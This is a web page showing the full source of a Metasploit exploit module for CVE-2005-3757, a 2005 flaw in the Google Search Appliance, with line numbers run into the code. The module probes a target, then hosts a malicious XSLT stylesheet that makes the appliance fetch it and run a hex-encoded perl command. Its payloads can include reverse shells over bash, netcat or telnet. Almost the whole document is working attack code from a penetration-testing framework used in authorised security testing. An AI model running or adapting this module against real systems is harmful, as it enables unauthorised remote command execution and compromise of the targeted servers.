Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking7include Msf::Exploit::Remote::HttpClient8include Msf::Exploit::Remote::HttpServer910def initialize(info = {})11super(update_info(info,12'Name' => 'Google Appliance ProxyStyleSheet Command Execution',13'Description' => %q{14This module exploits a feature in the Saxon XSLT parser used by15the Google Search Appliance. This feature allows for arbitrary16java methods to be called. Google released a patch and advisory to17their client base in August of 2005 (GA-2005-08-m). The target appliance18must be able to connect back to your machine for this exploit to work.19},20'Author' => [ 'hdm' ],21'License' => MSF_LICENSE,22'References' =>23[24['CVE', '2005-3757'],25['OSVDB', '20981'],26['BID', '15509'],27],28'Privileged' => false,29'Payload' =>30{31'DisableNops' => true,32'Space' => 4000,33'Compat' =>34{35'PayloadType' => 'cmd cmd_bash',36'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',37}38},39'Platform' => 'unix',40'Arch' => ARCH_CMD,41'Targets' => [[ 'Automatic', { }]],42'DisclosureDate' => '2005-08-16',43'Stance' => Msf::Exploit::Stance::Aggressive,44'DefaultTarget' => 0))45end4647# Handle incoming requests from the appliance48def on_request_uri(cli, request)4950print_status("Handling new incoming HTTP request...")5152exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'53data = @xml_data.gsub(/:x:MSF:x:/, exec_str)54send_response(cli, data)55end5657def autofilter58true59end6061def check62res = send_request_cgi({63'uri' => '/search',64'vars_get' =>65{66'client' => rand_text_alpha(rand(15)+1),67'site' => rand_text_alpha(rand(15)+1),68'output' => 'xml_no_dtd',69'q' => rand_text_alpha(rand(15)+1),70'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'71}72}, 10)7374if (res and res.body =~ /cannot be resolved to an ip address/)75vprint_status("This system appears to be vulnerable")76return Exploit::CheckCode::Appears77end7879if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)80vprint_status("This system appears to be patched")81end8283return Exploit::CheckCode::Safe84end858687def exploit8889# load the xml data90path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")91fd = File.open(path, "rb")92@xml_data = fd.read(fd.stat.size)93fd.close9495print_status("Obtaining the appliance site and client IDs...")96# Send a HTTP/1.0 request to learn the site configuration97res = send_request_raw({98'uri' => '/',99'version' => '1.0'100}, 10)101102if !(res and res['location'] and res['location'] =~ /site=/)103print_status("Could not read the location header: #{res.code} #{res.message}")104return105end106107m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)108if !(m and m[1] and m[2])109print_status("Invalid location header: #{res['location']}")110return111end112113print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")114start_service115116print_status("Requesting a search using our custom XSLT...")117res = send_request_cgi({118'uri' => '/search',119'vars_get' =>120{121'client' => m[2],122'site' => m[1],123'output' => 'xml_no_dtd',124'q' => rand_text_alpha(rand(15)+1),125'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",126'proxyreload' => '1'127}128}, 25)129130if (res)131print_status("The server returned: #{res.code} #{res.message}")132print_status("Waiting on the payload to execute...")133select(nil,nil,nil,20)134else135print_status("No response from the server")136end137end138end139140141